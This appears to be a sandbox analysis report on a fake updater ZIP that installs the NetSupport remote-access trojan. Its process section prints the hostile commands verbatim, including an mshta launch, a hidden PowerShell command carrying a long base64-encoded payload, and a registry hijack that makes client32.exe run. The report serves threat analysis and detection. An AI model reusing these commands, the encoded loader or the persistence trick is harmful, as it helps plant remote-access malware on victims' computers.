Malware Analysis Report

2025-04-13 09:52

Sample ID 230718-dyw1qsga94
Target Install Updater (V104.551.2)-stable.zip
SHA256 ab08ba5cb3eb0ef2cffeecefe99023bf0f080f19cfe0187892f5b08f41345e39
Tags
netsupport rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ab08ba5cb3eb0ef2cffeecefe99023bf0f080f19cfe0187892f5b08f41345e39

Threat Level: Known bad

The file Install Updater (V104.551.2)-stable.zip was found to be: Known bad.

Malicious Activity Summary

netsupport rat

NetSupport

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Enumerates physical storage devices

Kills process with taskkill

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-18 03:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-18 03:25

Reported

2023-07-18 03:30

Platform

win10v2004-20230703-en

Max time kernel

141s

Max time network

206s

Command Line

C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Install Updater (V104.551.2)-stable.zip"

Signatures

NetSupport

rat netsupport

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E} C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Roaming\\IonicBaseband\\client32.exe" C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1472 wrote to memory of 1368 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1472 wrote to memory of 1368 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1472 wrote to memory of 1368 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1368 wrote to memory of 3564 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1368 wrote to memory of 3564 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1368 wrote to memory of 3564 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3564 wrote to memory of 4572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3564 wrote to memory of 4572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3564 wrote to memory of 4572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3564 wrote to memory of 2944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3564 wrote to memory of 2944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3564 wrote to memory of 2944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 4784 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 4784 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 4784 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4784 wrote to memory of 3228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4784 wrote to memory of 3228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4784 wrote to memory of 3228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3228 wrote to memory of 2796 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3228 wrote to memory of 2796 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3228 wrote to memory of 2796 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4784 wrote to memory of 2188 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmstp.exe
PID 4784 wrote to memory of 2188 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmstp.exe
PID 4784 wrote to memory of 2188 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmstp.exe
PID 3548 wrote to memory of 4596 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3548 wrote to memory of 4596 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3548 wrote to memory of 4596 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4596 wrote to memory of 364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4596 wrote to memory of 364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4596 wrote to memory of 364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4596 wrote to memory of 1844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
PID 4596 wrote to memory of 1844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
PID 4596 wrote to memory of 1844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
PID 3548 wrote to memory of 4696 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\taskkill.exe
PID 3548 wrote to memory of 4696 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\taskkill.exe
PID 3548 wrote to memory of 4696 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\taskkill.exe

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Install Updater (V104.551.2)-stable.zip"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Install Updater (V104.551.2)-stable.zip\Install Updater (V104.551.2)-stable.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $uGSyEn = 'AAAAAAAAAAAAAAAAAAAAAPJlV3B1NhOYx3YVPpROLxNgaqL3qbdqyDshP+EuM5BY9U8ASIdSQGeEapX4ZZq7MccZfiZsI5TOvL/mZyPW+LsKs+zH8Xaw0XTtBFHBZeSWSHL5/q0MMmgIupTCSCfAg3u5vX5SH/4/1JZrK64q9gOJG5U3WXxsCd5fNkp9lxqQu9/Ke6QzKyXVADPmAXkzGyX4uUFQwTZKLjhzI16nB8fCYrFkEKZa7KVY68MiJMgAjG2yzQ4/DGStADYNF6DA0xDhemQLqlq8oDHDp114wKw390YCnP8OOPtTWb7Jxy33NLqzS5smWNQXVbMlZonbIbk4HTvfcBaaknbmSgIyY9myxQ0nhCeNNRYPNnnQWi+9Nv8b672212xu8rK7zM5ELy8w7kTdQJq0iwS2e5FiCmBBvwM6ja3Wi/VLULGk2nS8qbiTnNWzq3W6thTfTgDPpRL5wSg9XybFluV502aH1b1mbHToRQVWcOB+MtuaiGGmztKTWGN7pj+pHng97kl0vACDSWiC2zvS3nsucGBiM+yVWe2Jc1jejGTnT84tVcTKr/k4UJy2Dj3mz/K53w/8RMlNqMG0QPrGNlq1vvYMt1imL4+rNH49Vgr/wJAGNewpLiRSnLeiLws7lg8NQ2lChltLoK80QjU0/wgrtEmfzbcMigmkxHUlgiSIv9+MqvEuMnA8PqtOt/hHoi9O1zcmTkBsVyDbv3x02zAc8s5QYuNXrj2l+VXCwfWJgS/cyd1XRNCKKo/HzwlKgHycr15LiegLsh1vn5JGHgsiydTbBEHZMf8A/2dORoe/sL02oebQtEzzP2l+hqVP0hvhLaFuQfpg/6gTAlHHmeG5sSfXybeQgnsQFgnU/P7T9saaD6xhAjTpacIIohCdGRurCMPomSiLx2E+PZfCQJt9wN/MBtMXyMNp8Ap3xhxEEej4vYCjoNq0bHciaivvMOZnjVLfmxRBlpkGbIm/7iE/43Bgl2hj9evceUBKPUHOjJF29jSp1oIr6jJGcoUVXLLfuAXEvrSGmc0kxajGHw5tNkQ8xsg40qvp5ToXmuLz8xyjn0MZhLBh9iqlo+Ww/K7jAW2c6/U4RTO8FXtkFN3yaqYECTAawuwdYJrpEzBCnIiUBtVYItgPQYJ3+Rqh/i8x5lxireJFPJt1o9LoYGNli+HMazc0xjyI7cEE+eEbI+jicXVRy7noLNNKdSw8eh8eYqA5sjJQM2Nu6NGN/dRC+vFEzzxOaYVNR/Dl+7LZ1dsq0SKMqasNRLIJCUiW54ZLiFAjGJRN+3MZe38YE2KSEQaEcrcbH2/mHN0l0cY4Yuh34l8MkdbF+1DpFhAWtawBaVRJcJX1fjUG4Fd5oF2HqfQ1QpnGe9t9f12r5k4zkuidjH9fRoYNptt+IYPaOgXhlcg04iGrhE6/x5r4PT9x/1WDKIFnbgvXqw0LK7yGQRe+Qm0X8FDmfBkrqeKIEig4kITCnT6dyTu73InuFskasdGiov5Oxib3+Jy7L/A3r1vSnCIQfd3yzsRaxfj4JPjVWCOYONiNw5KOKqNoFrZlhuphQkn+ECqpABKTisjzCRwVb+g2D4uNe3pEybbAVa0d9yCKlhivKXIsgbcZZfEVnONk76wzrCD9FXY6/ZdNmUvqd1J0rMDPtiqpGuYfwOPhlkEfamNhx7r48pW2BZLhV61klwDb+5UXlyhcyz4PdOlOE+YVP/CoXm7eYad92E52MQPOMqatGBUX6Br0E0gqYzTXA+ttV3dSPn0Vlhv2SxrVuimlZU9Z6qeiSHiNg50t5s2nRUti+/j/mxJqyNHfERBvrMJe+biesmgiM530+uHMbKKzv784nEgISu7qe4+fZknfBhT1VQmEUXtLhitB3wtyQ6DqxRPpjZ22wcIkBpaUlsK+1APrve/AdE/G7yAnLUWuxOIZpsk7X4eMfd7nvZYRJ3acYIXL3HWKRI88F6eYl3Ins2vPnYDbV3F0FX6XbTqdDYCvdy62/NgWs02bDdBevko2tt1UtcG0hYutuOgbZ5hRBgptVGJ4AUuTP3bwz3pwnj2vV31sHuqsWjPW9ANthuoWx5xNjbp5bMcF7WHsOmAsccFWVlBKUyH9b2VL44huVrmKT9N182utrWTzCuQe5OG6tPdfQ5A8VPIOs6TS/qhZ0R/l7Fg1COr5eEyJnzYoqHF16Nk60O5EOBo9+T/RrwMzwuQnFtA3AIC45pBrHkOxH4PB1M9MqPRFJOXn5fAIXLmmauoC/SQ7tmY/55eaps0Fi+K48B+4tVWPXoj1yQTDUiPAOpOYOxqGL1Ma5lRKNAdZrXwi64S6zN2sgO0grqSR+OVrXSyuHU3zE75CQzKL0NyFtqotzPPITyAYWWVMKQZjCrAzB+jxcJkGTLI+b3fjXxnae8UIQsli0ZJW+FGTst9NXCUZ9xhvgnCUGu2PjLj8uDGmlnnC7W3m1jV6E8mAVT5/kKqfayDFfT9KcNO2sINm/Bszhb7nSGsGBydHBcm/zdVwX+QwIOob2r3c5KTk1TYGpZwQ4Wmaqw21P+9XS0f46Q+vPKoe2Uqn6m39ch8WXEfYK0YeDSxaX9vDXdBCG1jHKBUKBpr8lsmgUMYv+XFQyP+9PFkeQubE4TxWcRIhchDe22d2+0R+GmXx8LBgrq2+4ZoDkNnD9/ThD269G255Q8KE76Z/xAoPr+JCFGiplU/Y4ZEW9WQfcK/56qyl3qWD8rZgo+tpaKHcWI4Rz47W56LO7nmGKdy5hZ1Yv5JQ+Mzm6T9qhZWBrRvOShwRB37EK1Qk4ulSkZBks4sbk4b1+eaQDrTZNlCdDqAYPuRgg+tci2Re+kj0nJX4qS8K6g0Nd1Ea0Aqd/VRyKMeZbxVakjm4swRJWDvfeAZCO1wi8ldRBOjISvLwrbGkZ6RCgHdrmT9dh9TVNMUX997skUsrRyq1g9I6rbRtGs9ze/9aZKHMJEXNsQAz3crUgVXSmNYm/zVpPK/zZkAid9KOg8yO3bdDXLzTNZ12QtX+sfeZQWrT6bh0t3Wvz0R+wpEjhw86LgrJvu8ATsT0rnz0LpLDixbcsf0UWND0D4Vtzum2LNJInbjx5rOZqqZkRbUQI4UgWMzXhOJUdH61bD+mQFjksH6tyuTOMDrxDCwwnJSZ6kV83Qq0BmTzHYdRMC4FjPOod1QsfsLy4uYmaAtBYmX5d0CBPXdGQJY+d16fAkiS4EEq71SBo1+MlEhjODiT4DoN4f5AJn67jyDA4cnE5ly8LyvMLRnj6p7mO/F6wClJJ1CDNOyOGOpOSocM8Jng1hfCxtfLZUioyP4Lhd0vdtR/b+y6DRLOY9wJdigYsiEz1h6lWwm6fW0IYz5FefsFbJ+sPX+fH3BC1Jse4p0w4pBj8ziqRRaxAxlUdhBKRPfGuZU0EIIWoSIPnQwuh0aRD5jyq99CiaV0Gzq5HVDIrQ3LbUOF7VSmmsVv1ON8TESZ8fs13bScVJmkcYGpXsoP8iJLeBigIZh2synd/TLxyCo+kcnRjg5QXDbfW9rk45uy49UFlKd25+ulQjPZNSRkhKJMgrhT3thzCFCuURy6f/0DJMTBbadn2/rmixiX+7eFYwoZP4yaqgy3MNNvrN/NM3qHUkOAi65UnxZOyHpv6Oyb2O8iI8PTMFubKKhGL6ojHZgVC7V4cIOcp0izBUyRZj2H9aL1A6RQQIr4iy6i54EYVvgHDTkhgejoPcLd4pkpWjsZh0/cAnb8Y26EuPY+H9i1gJtUtI/Ih/5whUgWJdaBf+X9p1g8D98DLeLV4BlCe1Qz1OvtKCITeFX0HFIjMdEbVQZWIawvBGwfJ